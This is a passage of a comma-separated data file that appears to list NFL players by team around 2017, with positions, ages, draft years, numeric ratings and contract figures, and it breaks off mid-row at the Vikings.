LB,Brian Orakpo,31,2009,77,83,86,85,91,81,0.5,6 CB,Logan Ryan,20,2015,85,83,92,86,88,86,0.5,9 CB,Brice McCain,31,2009,63,70,85,84,90,58,1.9,1 OL,Brian Schwenke,26,2013,77,74,90,91,74,83,1,1 LB,Derrick Morgan,22,2013,72,77,88,77,83,76,0.5,6 K,Brett Kern,31,2008,70,64,70,90,83,64,2.1,3 OL,Ben Jones,28,2012,79,87,92,88,78,75,0.5,3 WR,Rishard Matthews,25,2012,78,89,89,89,89,80,0.5,8 L,David King,28,2013,65,60,86,83,82,83,0.4,4 S, OL,Josh Kline,28,2013,84,87,84,83,82,85,1.2,1 OL,Taylor Lewan,16,2014,85,91,89,91,85,83,0.5,8 LB,Avery Williamson,15,2014,72,77,88,87,86,79,0.6,1 DL,DaQuan Jones,26,2014,85,87,83,88,91,82,0.6,5 QB,Marcus Mariota,24,2015,77,78,94,89,79,77,0.5,8 RB,Jalston Fowler,27,2015,77,74,75,75,77,72,0.5,2 CB, S,Curtis Riley,25,2015,66,63,87,82,89,62,0.3,1 OL,Quinton Spain,26,2015,84,83,89,84,77,82,0.3,4 RB,Derrick Henry,23,2016,89,86,90,88,88,85,0.5,8 WR,Tajae Sharpe,23,2016,76,77,87,86,87,77,0.4,3 OL,Jack Conklin,23,2016,83,86,92,87,78,73,0.5,6 LB, DL,Austin Johnson,23,2016,78,68,88,81,85,82,1.2,3 S,Kevin Byard,24,2016,81,78,89,85,89,76,0.7,8 RB,David Fluellen,25,2014,73,59,86,77,82,82,0.4,2 WR,Corey Davis,20,2017,83,72,88,83,90,83,0.5,6 WR,Taywan Taylor,22,2017,74,65,92,82,92,80,0.7,4 CB,Adoree' Jackson,22,2017,80,66,87,86,92,76,0.1,9 OL,Corey Levin,23,2017,70,58,86,85,78,74,0.4,4 RB,Le'Veon Bell ,16,2017,87,87,87,94,90,94,0.5,9 WR,AntonioBrown,18,2017,94,98,92,98,92,93,0.5,8 WR,Rob Gronkowski,20,2017,86,94,85,96,83,80,0.5,9 CB,Jalen Ramsey, 15,2017,88,90,87,90,93,90,0.5,9 LB,Von Miller, 18,2017,89,92,92,94,93,87,0.5,8 WR,Odell Beckham Jr.,16,2017,81,94,90,89,94,85,0.5,6 OL,Alex Mack, 18,2017,79,97,94,91,98,88,0.5,7 QB,Cam Newton, 12,2017,91,95,99,99,90,98,0.5,9 LB,Luke Kuechly, 16,2017,90,96,96,97,93,90,0.5,8 CB,Marshon Lattimore,17,2017,72,73,79,88,94,78,0.5,7 CB,Patrick Peterson, 15,2017,80,88,93,94,92,71,0.5,8 DL,Aaron Donald, 16,2017,80,90,92,95,96,93,0.5,8 CB,Richard Sherman,17,2017,88,91,96,94,98,88,0.5,8 S,Kam Chancellor,18,2017,88,95,99,99,96,93,0.5,9 END_PLAYERS ###################################################################### BRONCOS Denver Broncos,DEN DL,Domata Peko,33,2006,60,86,85,90,84,72,2.5,2 WR,Demaryius Thomas,30,2010,73,90,90,83,91,84,9.7,3 CB,Aqib Talib,31,2008,79,93,88,92,88,71,6.3,3 WR,Virgil Green,29,2011,71,75,81,78,86,79,2,1 RB,Jamaal Charles,31,2008,74,84,82,83,90,85,1.5,1 CB,Chris Harris Jr.,28,2011,77,93,91,93,91,69,6.3,3 S,Darian Stewart,29,2010,72,82,89,85,85,69,4.6,4 OL,Menelik Watson,29,2013,79,76,83,84,72,71,4.4,3 WR,Emmanuel Sanders,30,2010,78,94,86,97,92,79,8.3,3 OL,Allen Barbre,33,2007,60,76,85,84,77,73,1,1 DL,Derek Wolfe,27,2012,75,83,89,89,92,85,6.6,3 QB,Brock Osweiler,27,2012,80,69,92,96,75,58,0.5,1 OL,Donald Stephenson,29,2012,80,73,86,84,74,69,3.4,2 DL,Jared Crick,28,2012,66,79,81,81,84,81,1.5,1 LB,Brandon Marshall,28,2012,71,83,88,89,86,83,5.3,4 DL,Billy Winn,28,2012,67,65,84,82,85,84,0.5,1 OL,Ronald Leary,28,2012,80,86,82,87,78,89,5.9,4 RB,CJ Anderson,26,2013,82,88,86,93,89,90,2.7,3 OL,Matthew Paradis,28,2014,85,88,85,90,80,86,0.4,1 OL,Cyrus Kouandjio,24,2014,79,74,77,86,77,78,0.4,1 DL,Shelby Harris,26,2014,68,71,83,84,86,83,0.4,1 CB,Bradley Roby,25,2014,83,76,84,88,93,60,1.5,1 OL,Billy Turner,26,2014,78,73,85,85,69,77,0.5,1 WR,Cody Latimer,25,2014,68,48,85,78,90,77,0.7,1 DL,Zach Kerr,27,2014,67,63,77,87,87,78,1.1,2 LB,Kasim Edebali,28,2014,60,60,85,72,76,74,0.8,1 K,Brandon McManus,26,2014,74,60,85,97,90,60,1.6,1 LB,Todd Davis,25,2014,87,85,90,88,86,81,1.6,1 QB,Trevor Siemian,26,2015,73,83,85,88,81,63,0.4,2 WR,Jeff Heuerman,25,2015,72,67,85,79,79,69,0.5,2 WR,AJ Derby,26,2015,64,62,84,82,82,75,0.4,2 OL,Max Garcia,26,2015,76,79,86,89,75,72,0.4,2 LB,Shane Ray,24,2015,85,76,84,76,79,81,2.1,2 CB,Lorenzo Doss,23,2015,66,60,87,79,89,45,0.4,2 LB,Zaire Anderson,25,2015,67,52,85,81,81,74,0.3,1 WR,Jordan Taylor,25,2015,79,69,87,82,88,71,0.3,1 LB,Shaquil Barrett,25,2014,88,87,87,79,79,79,0.4,1 WR,Bennie Fowler,26,2014,71,73,79,81,91,78,0.4,1 OL,Casey Kreiter,27,2014,61,60,87,68,48,72,0.3,1 QB,Paxton Lynch,23,2016,78,64,92,93,74,74,2.2,3 RB,Devontae Booker,25,2016,82,77,90,80,87,85,0.5,3 OL,Connor McGovern,24,2016,65,58,90,87,78,71,0.4,3 DL,Adam Gotsis,25,2016,75,77,84,82,85,80,0.8,3 S,Justin Simmons,24,2016,74,72,86,85,88,75,0.6,3 RB,Andy Janovich,24,2016,77,72,85,74,79,72,0.4,3 S,William Parks,23,2016,76,71,87,80,85,74,0.4,3 K,Riley Dixon,24,2016,78,59,86,88,79,59,0.4,3 CB,Brendan Langley,23,2017,77,59,88,81,91,74,0.6,4 OL,Garett Bolles,25,2017,78,73,89,90,87,77,2.6,4 LB,Demarcus Walker,23,2017,70,62,91,77,81,72,1,4 RB,De'Angelo Henderson,25,2017,62,56,85,81,90,81,0.4,4 WR,Isaiah McKenzie,22,2017,74,61,82,80,92,75,0.4,4 S,Jamal Carter,23,2017,72,50,89,77,85,72,0.3,3 OL,Elijah Wilkinson,22,2017,70,63,83,80,72,73,0.3,1 END_PLAYERS ###################################################################### CHIEFS Kansas City Chiefs,KC DL,Roy Miller,30,2009,64,74,85,87,89,78,0.8,1 RB,Anthony Sherman,29,2011,73,79,90,68,79,67,1.3,1 S,Eric Berry,29,2010,77,93,90,92,91,79,10.2,6 LB,Derrick Johnson,35,2005,66,93,87,89,84,83,5.5,2 K,Dustin Colquitt,35,2005,42,70,89,89,87,70,2.7,1 LB,Tamba Hali,34,2006,59,86,89,81,88,78,5.1,2 DL,Allen Bailey,28,2011,62,74,89,90,88,84,4.9,2 DL,Jarvis Jenkins,29,2011,64,77,77,91,87,76,0.5,1 LB,Justin Houston,28,2011,75,91,87,92,92,84,12.5,4 QB,Alex Smith,33,2005,74,90,91,87,86,63,10.4,2 S,Ron Parker,30,2011,75,82,83,87,90,69,3.6,3 LB,Frank Zombo,30,2010,72,73,87,78,76,75,0.8,2 OL,Eric Fisher,26,2013,85,84,91,88,74,85,8.7,5 WR,Travis Kelce,28,2013,73,95,84,91,85,83,6.8,5 DL,Bennie Logan,28,2013,70,78,84,89,92,81,5.4,1 OL,Mitchell Schwartz,28,2012,80,85,87,86,85,73,4.8,4 QB,Tyler Bray,26,2013,63,52,83,93,70,45,0.6,1 CB,Terrance Mitchell,25,2014,73,74,89,85,89,64,0.4,1 CB,Phillip Gaines,26,2014,75,66,84,85,93,49,0.5,1 CB,Kenneth Acker,25,2014,73,64,82,83,89,53,0.4,1 OL,Zach Fulton,26,2014,79,78,86,85,80,75,0.5,1 LB,Dee Ford,26,2014,76,74,86,76,82,83,2.7,2 WR,De'Anthony Thomas,24,2014,78,70,76,78,92,83,0.5,1 LB,Kevin Pierre-Louis,26,2014,72,69,82,82,84,84,0.4,1 OL,Laurent Duvernay-Tard,26,2014,81,80,89,92,73,83,5.5,6 WR,Demetrius Harris,26,2013,72,75,83,78,87,78,1,2 WR,Albert Wilson,25,2014,79,79,85,84,91,78,1.1,1 S,Daniel Sorensen,27,2014,75,77,90,82,84,70,3,4 OL,Jordan Devey,29,2014,72,65,87,82,80,69,0.4,1 S,Steven Terrell,27,2013,74,66,85,84,92,58,0.4,1 RB,Charcandric West,26,2014,75,73,82,81,91,83,0.9,2 WR,Chris Conley,25,2015,78,73,85,83,93,78,0.6,2 OL,Mitch Morse,25,2015,78,87,85,92,81,74,0.9,2 OL,Cameron Erving,25,2015,74,70,86,84,73,74,2.2,2 DL,Rakeem Nunez-Roches,24,2015,71,65,80,80,85,79,0.3,1 LB,Ramik Wilson,25,2015,83,81,88,85,84,84,0.3,1 CB,Marcus Peters,24,2015,80,90,87,90,90,70,2.2,2 CB,Steven Nelson,24,2015,73,74,91,85,90,74,0.5,2 RB,Akeem Hunt,24,2015,70,68,85,71,92,76,0.3,1 OL,James Winchester,28,2013,61,50,75,67,48,50,0.5,5 OL,Bryan Witzmann,27,2014,68,72,85,80,77,73,0.3,1 WR,Demarcus Robinson,23,2016,78,57,86,75,88,75,0.5,3 OL,Parker Ehinger,25,2016,78,66,83,80,79,74,0.5,3 DL,Chris Jones,23,2016,84,86,86,88,90,87,1.3,3 LB,Reggie Ragland,24,2016,74,68,89,82,84,80,1.2,3 LB,Terrance Smith,24,2016,73,56,81,78,81,76,0.3,1 S,Eric Murray,23,2016,81,65,89,82,89,70,0.5,3 WR,Tyreek Hill,23,2016,79,87,83,88,97,80,0.4,3 WR,Ross Travis,24,2015,64,57,87,76,84,74,0.3,2 QB,Patrick Mahomes,22,2017,68,61,92,97,78,78,4,4 RB,Kareem Hunt,22,2017,83,86,86,90,90,86,0.6,4 WR,Jehu Chesson,24,2017,69,61,87,84,90,77,0.5,4 LB,Tanoh Kpassagnon,23,2017,72,60,85,77,83,73,0.8,4 K,Harrison Butker,22,2017,76,53,80,91,83,53,0.4,4 LB,Ukeme Eligwe,23,2017,76,56,84,83,83,76,0.4,4 END_PLAYERS ###################################################################### RAIDERS Oakland Raiders,OAK S,Reggie Nelson,34,2007,42,81,93,86,87,73,2.5,1 OL,Donald Penn,34,2006,59,96,86,92,89,84,3.6,1 OL,Rodney Hudson,28,2011,87,92,90,88,89,87,5.3,3 WR,Lee Smith,30,2011,65,73,84,69,72,66,1.3,1 CB,Sean Smith,30,2009,69,78,88,89,87,74,6.8,3 LB,Navorro Bowman,29,2010,74,85,85,89,88,82,1.6,1 WR,Michael Crabtree,30,2009,82,95,91,88,87,83,5.3,3 K,Marquette King,29,2012,78,70,84,98,92,70,2,4 RB,Jamize Olawale,28,2012,72,76,86,75,87,77,1.1,2 OL,Marshall Newhouse,29,2010,75,73,85,86,81,76,1,2 K,Sebastian Janikowski,39,2000,65,63,82,97,87,63,3.5,1 OL,Jon Condo,36,2005,56,82,84,71,51,65,0.7,1 QB,EJ Manuel,27,2013,65,66,89,92,76,72,0.5,1 WR,Cordarrelle Patterson,26,2013,74,73,89,84,92,89,2.5,2 CB,David Amerson,26,2013,83,84,86,88,90,77,4.1,4 RB,Marshawn Lynch,31,2007,68,84,89,94,89,90,2.7,2 WR,Jared Cook,30,2009,72,83,84,84,86,76,3.2,2 LB,Bruce Irvin,30,2012,70,77,91,84,80,83,6.3,3 OL,Kelechi Osemele,28,2012,89,95,85,93,88,79,7.1,4 K,Giorgio Tavecchio,27,2012,63,54,81,91,84,54,0.3,1 OL,Gabe Jackson,26,2014,76,86,86,92,72,75,5.7,6 CB,Travis Carrie,27,2014,82,77,84,89,91,76,0.5,1 S,Keith McGill,28,2014,60,56,80,81,89,71,0.5,1 QB,Derek Carr,26,2014,78,84,91,95,82,67,14,6 DL,Justin Ellis,27,2014,74,76,83,84,89,81,0.6,1 DL,Khalil Mack,26,2014,86,94,95,87,93,95,5.7,2 DL,Denico Autry,27,2014,78,75,83,75,81,81,1.1,1 WR,Amari Cooper,23,2015,88,85,85,83,92,88,5.6,2 WR,Clive Walford,26,2015,74,74,86,83,79,73,0.6,2 OL,Jon Feliciano,25,2015,68,65,87,81,79,77,0.5,2 DL,Mario Edwards Jr.,23,2015,80,78,78,88,88,83,1.3,2 CB,Dexter McDonald,26,2015,62,51,83,81,91,52,0.4,2 WR,Seth Roberts,26,2014,75,81,86,83,91,77,0.2,3 QB,Connor Cook,24,2016,69,64,91,90,76,52,0.5,3 RB,DeAndre Washington,24,2016,73,68,90,79,91,85,0.4,3 OL,Vadal Alexander,23,2016,70,64,87,86,74,78,0.4,3 LB,Jihad Ward,23,2016,77,64,89,82,84,73,1.2,3 LB,Shilique Calhoun,25,2016,66,62,89,79,82,77,0.6,3 DL,James Cowser,27,2016,68,57,84,81,82,84,0.3,1 S,Karl Joseph,24,2016,86,84,85,87,87,77,2.8,3 LB,Cory James,24,2016,82,72,88,82,79,81,0.4,3 DL,Darius Latham,23,2016,71,59,84,82,84,78,0.3,2 S,Erik Harris,27,2015,62,57,87,77,85,67,0.3,1 WR,Johnny Holton,26,2016,67,48,87,76,92,79,0.3,2 RB,Jalen Richard,24,2016,83,78,87,86,90,85,0.3,2 OL,David Sharpe,22,2017,70,63,86,87,80,76,0.5,4 DL,Treyvon Hester,25,2017,79,67,85,85,83,77,0.4,4 DL,Eddie Vanderdoes,23,2017,80,67,85,89,86,84,0.6,4 LB,Marquel Lee,22,2017,79,73,90,83,83,77,0.4,4 CB,Gareon Conley,22,2017,78,73,88,85,91,71,2.4,4 S,Obi Melifonwu,23,2017,71,62,89,85,92,75,0.9,4 OL,Jylan Ware,24,2017,65,53,87,85,77,73,0.4,4 S,Shalom Luani,23,2017,67,59,88,79,87,64,0.4,4 LB,Xavier Woodson-Luste,22,2017,70,61,85,77,77,77,0.3,3 LB,Nicholas Morrow,22,2017,74,69,84,77,80,83,0.3,3 END_PLAYERS ###################################################################### CHARGERS Los Angeles Chargers,LAC OL,Mike Windt,31,2010,76,72,83,73,55,65,0.8,4 QB,Philip Rivers,36,2004,55,90,97,89,84,43,15.2,3 WR,Antonio Gates,37,2003,71,95,82,89,77,78,3.6,1 OL,Joe Barksdale,29,2011,80,77,85,88,72,73,3.9,3 DL,Corey Liuget,27,2011,75,83,89,91,93,86,7,4 WR,Jeff Cumberland,30,2010,75,82,83,73,86,65,0.5,1 OL,Matt Slauson,31,2009,74,91,87,89,74,73,1.4,1 QB,Kellen Clemens,34,2006,58,72,84,84,76,44,0.7,1 WR,Keenan Allen,25,2013,82,93,80,92,87,84,6.5,4 OL,Russell Okung,29,2010,75,81,84,88,73,87,9.4,4 DL,Brandon Mebane,32,2007,74,87,86,91,92,80,3.3,2 OL,Kenny Wiggins,29,2011,82,75,86,84,72,73,0.6,1 K,Nick Novak,36,2005,42,64,79,90,88,64,0.5,1 DL,Melvin Ingram,28,2012,75,85,87,83,85,90,11.2,4 CB,Casey Hayward,28,2012,70,89,83,88,89,67,3.6,2 WR,Travis Benjamin,28,2012,71,85,80,86,92,81,4.3,3 LB,Korey Toomer,29,2012,66,80,76,78,79,88,1.1,1 WR,Sean McGrath,30,2012,64,74,86,75,77,67,0.4,1 S,Jahleel Addae,27,2013,79,83,89,85,83,74,3.7,4 DL,Damion Square,28,2013,64,70,82,80,82,82,1.6,2 RB,Andre Williams,25,2014,71,72,84,84,87,80,0.4,1 DL,Jeremiah Attaochu,24,2014,83,74,84,73,79,88,0.8,1 CB,Jason Verrett,26,2014,85,83,88,91,93,67,2.6,2 S,Tre Boston,25,2014,78,77,87,85,87,75,0.6,1 OL,Michael Schofield,27,2014,79,76,84,83,74,72,0.7,1 DL,Chris McCain,26,2014,71,68,86,61,69,85,0.4,1 OL,Michael Ola,29,2014,71,63,84,84,77,77,0.4,1 DL,Tenny Palepoi,27,2014,71,68,82,89,89,82,0.4,1 RB,Branden Oliver,26,2014,74,72,86,85,88,86,0.5,1 S,Adrian Phillips,25,2014,70,68,87,82,87,69,0.4,1 RB,Melvin Gordon,24,2015,80,87,88,87,92,89,2.5,2 WR,Geremy Davis,25,2015,62,48,81,84,89,80,0.4,1 DL,Darius Philon,23,2015,79,68,84,79,82,85,0.4,2 LB,Kyle Emanuel,26,2015,68,70,86,72,80,77,0.4,2 LB,Denzel Perryman,24,2015,88,79,90,84,88,81,1,2 LB,Hayes Pullard,25,2015,66,67,87,77,76,79,0.3,2 LB,Nick Dzubnar,26,2015,78,66,89,85,82,73,0.3,1 WR,Tyrell Williams,25,2015,76,85,84,86,91,82,0.3,1 QB,Cardale Jones,25,2016,64,62,90,96,68,73,0.5,3 RB,Derek Watt,25,2016,62,54,90,73,81,72,0.4,3 WR,Hunter Henry,23,2016,84,77,91,86,84,74,1.4,3 DL,Joey Bosa,22,2016,91,82,87,87,84,87,6.4,3 LB,Jatavis Brown,23,2016,83,76,88,86,88,84,0.4,3 K,Drew Kaser,24,2016,67,51,73,95,75,51,0.4,3 OL,Spencer Pulley,24,2016,75,75,86,83,78,74,0.3,2 CB,Trevor Williams,24,2016,79,78,85,87,91,68,0.3,1 WR,Mike Williams,23,2017,82,74,88,87,89,83,4.8,4 CB,Michael Davis,22,2017,68,57,89,78,92,72,0.3,1 OL,Dan Feeney,23,2017,73,64,84,91,77,75,0.7,4 CB,Desmond King,23,2017,84,72,92,84,86,72,0.4,4 LB,James Onwualu,23,2017,73,59,87,78,80,78,0.3,3 S,Rayshawn Jenkins,23,2017,70,62,84,81,89,74,0.6,4 OL,Sam Tevi,23,2017,63,55,87,79,78,74,0.4,4 RB,Austin Ekeler,22,2017,79,58,85,75,92,83,0.3,3 WR,Sean Culkin,24,2017,67,55,89,74,82,71,0.3,3 END_PLAYERS ###################################################################### BEARS Chicago Bears,CHI DL,Mitch Unrein,30,2010,75,84,84,84,85,81,0.8,1 K,Connor Barth,31,2008,57,60,78,88,84,60,0.6,1 LB,Pernell McPhee,29,2011,75,83,87,83,91,77,4.9,3 LB,Sam Acho,29,2011,67,74,86,83,80,76,0.6,1 CB,Prince Amukamara,28,2011,75,81,87,89,90,84,6.3,1 WR,Zach Miller,33,2009,47,79,80,89,85,77,1.9,1 QB,Mark Sanchez,31,2009,75,70,88,87,74,55,1.6,1 LB,Willie Young,32,2010,74,81,85,76,80,78,2.7,2 OL,Josh Sitton,31,2008,76,92,84,91,77,83,4.6,2 OL,Bradley Sowell,28,2012,75,72,83,83,78,73,0.5,1 WR,Josh Bellamy,28,2012,65,77,87,79,89,75,0.5,1 OL,Kyle Long,29,2013,73,85,91,84,85,80,6,5 QB,Mike Glennon,28,2013,70,77,90,93,77,42,9.6,3 WR,Markus Wheaton,26,2013,79,75,89,83,90,80,3.7,2 DL,John Jenkins,28,2013,68,66,82,92,89,79,0.6,1 CB,Sherrick McManis,30,2010,60,63,80,82,87,68,0.9,1 WR,Dion Sims,26,2013,76,77,80,82,80,72,3.8,3 S,Quintin Demps,32,2008,69,77,87,83,88,72,2.9,3 WR,Kendall Wright,28,2012,68,78,91,86,90,85,1.3,1 DL,Akiem Hicks,28,2012,72,87,86,87,90,83,3.3,1 OL,Bobby Massie,28,2012,77,78,88,83,73,74,3.9,2 LB,Danny Trevathan,27,2012,80,86,87,92,83,82,4.4,3 OL,Tom Compton,28,2012,76,71,90,90,74,74,1.6,1 LB,Jerrell Freeman,31,2012,70,89,88,94,86,82,2.7,2 CB,Marcus Cooper,27,2013,74,76,87,85,90,70,3.5,3 OL,Andrew Depaola,30,2012,69,65,83,76,73,71,0.4,1 RB,Benny Cunningham,27,2013,78,75,87,80,87,79,0.6,1 CB,Kyle Fuller,25,2014,76,76,90,88,92,77,2.3,1 OL,Charles Leno Jr.,26,2014,76,81,85,81,85,75,0.4,5 K,Pat O'Donnell,26,2014,71,66,81,91,85,66,0.4,1 LB,Christian Jones,26,2014,78,75,89,80,79,81,1.2,1 WR,Dontrelle Inman,28,2014,73,78,86,88,88,82,1.6,1 RB,Mike Burton,25,2015,73,77,84,64,81,65,0.4,2 WR,Tre McBride,25,2015,61,41,86,86,91,83,0.3,1 OL,Hroniss Grasu,26,2015,81,74,86,78,74,73,0.6,2 DL,Eddie Goldman,23,2015,77,78,84,88,90,78,1.2,2 S,Adrian Amos,24,2015,82,77,85,85,93,61,0.4,2 CB,Bryce Callahan,26,2015,85,80,86,90,94,56,0.4,1 WR,Cameron Meredith,25,2015,85,86,87,89,89,82,0.3,1 WR,Daniel Brown,25,2015,73,57,86,78,86,74,0.4,1 RB,Jordan Howard,23,2016,80,87,85,89,90,89,0.4,3 OL,Cody Whitehair,25,2016,86,88,89,87,77,70,0.8,3 DL,Jonathan Bullard,24,2016,68,59,87,80,84,87,0.6,3 LB,Nick Kwiatkoski,24,2016,76,74,87,85,85,82,0.5,3 LB,Leonard Floyd,25,2016,74,74,86,83,82,85,3.8,3 CB,Deiondre' Hall,23,2016,63,51,86,81,88,64,0.5,3 S,Deon Bush,24,2016,78,62,87,81,87,67,0.5,3 S,DeAndre Houston-Carso,24,2016,65,52,89,79,88,77,0.4,3 CB,Cre'von LeBlanc,23,2016,74,68,85,82,87,75,0.3,2 QB,Mitchell Trubisky,23,2017,78,68,93,93,79,75,7.2,4 WR,Adam Shaheen,24,2017,66,60,86,82,81,78,1.3,4 S,Eddie Jackson,25,2017,71,71,78,83,88,67,0.6,4 LB,Roy Robertson-Har,24,2016,71,62,85,80,83,73,0.3,2 RB,Tarik Cohen,22,2017,82,77,85,81,92,88,0.5,4 RB,Taquan Mizzell,24,2017,74,51,85,71,87,80,0.3,3 END_PLAYERS ###################################################################### LIONS Detroit Lions,DET K,Matt Prater,33,2006,47,69,74,95,95,69,1.9,1 OL,Don Muhlbach,36,2004,63,82,84,77,62,52,0.7,1 S,Don Carey,30,2009,66,63,86,81,86,64,0.5,1 OL,Don Barclay,28,2012,81,75,87,82,73,69,0.7,1 QB,Matthew Stafford,29,2009,77,86,94,98,82,64,16.1,1 OL,TJ Lang,30,2009,88,92,88,89,87,86,7.3,3 DL,Ziggy Ansah,28,2013,70,79,88,84,86,89,5.5,1 CB,DJ Hayden,27,2013,77,71,82,86,91,78,2.8,1 LB,Nick Bellore,28,2011,70,76,83,87,85,73,0.5,1 CB,Darius Slay,26,2013,84,86,86,91,94,72,8.9,4 DL,Haloti Ngata,33,2006,55,84,91,94,92,81,4.8,1 WR,Golden Tate,29,2010,70,89,91,88,89,90,5,2 S,Glover Quin,31,2009,78,90,89,88,86,73,4.6,3 DL,Akeem Spence,26,2013,77,67,86,91,84,78,2.2,3 K,Sam Martin,27,2013,64,66,84,96,86,66,2,4 OL,Ricky Wagner,28,2013,82,87,85,87,84,80,7.4,5 DL,Cornelius Washington,28,2013,66,68,76,88,84,84,2.2,2 S,Tavon Wilson,27,2012,86,83,92,85,87,73,1.1,1 LB,Tahir Whitehead,27,2012,85,87,88,91,84,85,2.5,1 WR,Marvin Jones,27,2012,79,87,89,83,90,80,4.8,4 DL,Jacquies Smith,27,2012,69,73,78,72,73,82,1.1,1 RB,Theo Riddick,26,2013,77,85,88,78,87,85,2.3,3 LB,Paul Worrilow,27,2013,77,72,89,81,81,78,2.2,1 OL,Travis Swanson,26,2014,82,86,90,87,73,73,0.7,1 CB,Nevin Lawson,26,2014,78,78,89,86,90,78,0.6,1 DL,Khyri Thornton,28,2014,60,58,82,86,83,78,1.1,2 WR,Eric Ebron,24,2014,87,82,88,83,87,82,2.9,1 WR,TJ Jones,25,2014,70,66,89,82,90,79,0.4,1 WR,Jared Abbrederis,27,2014,68,68,88,79,89,71,0.4,1 RB,Darren Fells,31,2014,71,76,84,71,73,72,0.7,1 RB,Ameer Abdullah,24,2015,89,79,85,84,89,87,0.8,2 OL,Corey Robinson,25,2015,74,62,80,89,79,77,0.4,2 OL,Brian Mihalik,25,2015,62,59,83,82,74,71,0.3,2 CB,Quandre Diggs,24,2015,78,80,89,84,87,67,0.4,2 RB,Zach Zenner,26,2015,71,76,84,83,87,79,0.3,1 OL,Emmett Cleary,27,2013,61,52,87,81,78,75,0.4,1 OL,Graham Glasgow,25,2016,73,74,89,84,74,74,0.5,3 OL,Taylor Decker,23,2016,89,86,90,90,84,84,2.6,3 DL,Anthony Zettel,25,2016,76,79,90,83,86,88,0.4,3 DL,A'Shawn Robinson,22,2016,78,71,89,86,89,81,1.1,3 LB,Steve Longa,23,2016,62,50,89,85,85,73,0.3,2 S,Miles Killebrew,24,2016,86,76,88,85,87,81,0.5,3 QB,Jake Rudock,24,2016,71,56,88,88,73,56,0.3,1 RB,Dwayne Washington,23,2016,77,65,80,76,90,78,0.4,3 S,Charles Washington,24,2016,76,59,84,83,90,65,0.3,2 WR,Jace Billingsley,24,2016,70,54,87,77,90,82,0.3,2 WR,Michael Roberts,23,2017,80,65,88,81,77,70,0.5,4 DL,Jeremiah Ledbetter,23,2017,77,63,85,83,84,83,0.4,4 LB,Jarrad Davis,22,2017,77,76,82,89,89,84,2.6,4 LB,Jalen Reeves-Maybin,22,2017,78,62,84,77,76,79,0.5,4 CB,Teez Tabor,22,2017,70,63,88,80,87,72,1,4 WR,Kenny Golladay,24,2017,70,66,88,86,90,81,0.6,4 CB,Jamal Agnew,22,2017,72,51,85,81,93,76,0.4,4 DL,Jeremiah Valoaga,23,2017,69,62,85,68,73,81,0.3,3 RB,Tion Green,24,2017,72,54,83,80,81,81,0.3,3 END_PLAYERS ###################################################################### PACKERS Green Bay Packers,GB WR,Randall Cobb,27,2011,78,87,89,96,91,81,7.9,2 WR,Lance Kendricks,29,2011,71,79,89,78,82,74,1.6,2 CB,Davon House,28,2011,67,74,86,83,89,60,2.2,1 LB,Ahmad Brooks,33,2006,70,76,88,69,79,76,3.1,1 OL,Bryan Bulaga,28,2010,90,94,86,88,74,87,5,3 S,Morgan Burnett,28,2010,76,84,86,87,86,78,4.9,1 LB,Clay Matthews,31,2009,70,85,91,83,87,83,10.4,2 QB,Aaron Rodgers,34,2005,74,97,96,97,92,67,17.4,3 K,Mason Crosby,33,2007,64,59,87,94,84,59,3.2,3 WR,Jordy Nelson,32,2008,84,98,89,97,89,77,7.6,2 OL,Jahri Evans,34,2006,66,84,87,87,80,77,1.5,1 OL,David Bakhtiari,26,2013,89,98,83,90,82,94,7.5,4 DL,Quinton Dial,27,2013,83,77,78,87,87,78,2.7,3 LB,Nick Perry,27,2012,79,83,88,82,85,84,9.3,5 DL,Mike Daniels,28,2012,76,92,87,94,95,87,7.9,3 OL,Lane Taylor,28,2013,72,83,85,87,79,75,1.5,1 OL,Corey Linsley,26,2014,76,88,85,91,79,75,0.6,1 CB,Demetri Goodson,28,2014,55,59,78,83,91,53,0.4,1 S,Ha Ha Clinton-Dix,25,2014,77,84,90,86,87,80,2.3,2 OL,Ulrick John,25,2014,71,71,84,77,75,71,0.3,1 WR,Davante Adams,25,2014,86,92,87,90,89,81,0.8,1 WR,Richard Rodgers,25,2014,79,76,82,83,78,75,0.7,1 WR,Jeff Janis,26,2014,72,66,86,79,92,74,0.3,1 QB,Brett Hundley,24,2015,77,58,88,91,74,75,0.4,2 RB,Aaron Ripkowski,25,2015,85,84,82,67,82,63,0.4,2 RB,Ty Montgomery,24,2015,83,81,83,82,90,86,0.5,2 LB,Jake Ryan,25,2015,74,78,84,85,84,80,0.5,2 CB,Quinten Rollins,25,2015,71,71,90,84,87,79,0.7,2 CB,Damarious Randall,25,2015,79,72,87,86,90,70,1.8,2 S,Jermaine Whitehead,24,2015,68,51,86,79,89,53,0.3,1 LB,Joe Thomas,26,2014,82,77,87,80,80,81,0.4,1 OL,Justin McCray,25,2014,76,66,80,89,77,72,0.3,1 WR,Geronimo Allison,23,2016,73,71,84,82,87,77,0.3,1 OL,Jason Spriggs,23,2016,74,66,92,83,77,76,1,3 DL,Kenny Clark,22,2016,82,78,89,87,88,80,2.1,3 LB,Blake Martinez,23,2016,91,83,92,85,86,80,0.5,3 LB,Kyler Fackrell,26,2016,73,63,84,83,82,78,0.6,3 DL,Dean Lowry,23,2016,75,62,89,86,89,84,0.5,3 WR,Trevor Davis,24,2016,73,68,85,78,92,72,0.4,3 QB,Joe Callahan,24,2016,67,53,89,85,75,61,0.3,1 CB,Josh Hawkins,24,2016,66,57,84,84,93,45,0.3,2 S,Marwin Evans,24,2016,66,54,87,82,90,64,0.3,2 RB,Jamaal Williams,22,2017,81,63,86,84,88,83,0.5,4 DL,Montravius Adams,23,2017,75,60,92,86,84,83,0.4,4 LB,Vince Biegel,24,2017,74,62,83,79,81,77,0.6,4 CB,Kevin King,22,2017,72,69,86,86,91,74,1.6,4 S,Josh Jones,23,2017,71,71,88,85,92,77,0.8,4 K,Justin Vogel,24,2017,77,55,78,93,81,55,0.3,3 OL,Derek Hart,25,2017,63,53,86,68,45,67,0.3,1 OL,Lucas Patrick,24,2016,76,62,84,81,78,72,0.3,1 RB,Devante Mays,23,2017,63,51,86,81,88,80,0.4,4 RB,Aaron Jones,23,2017,71,61,82,82,89,85,0.4,4 LB,Chris Odom,23,2017,64,49,85,77,80,70,0.3,3 CB,Lenzy Pipkins,24,2017,72,54,78,79,90,69,0.3,3 CB,Donatello Brown,26,2017,63,49,88,79,89,53,0.3,1 END_PLAYERS ###################################################################### VIKINGS Minnesota Vikings,MIN WR,Kyle Rudolph,28,2011,75,90,89,92,77,75,5.1,3 S,Andrew Sendejo,30,2010,64,77,84,80,83,76,2.4,3 CB,Terence Newman,39,2003,58,87,86,87,87,72,2.2,1 OL,Joe 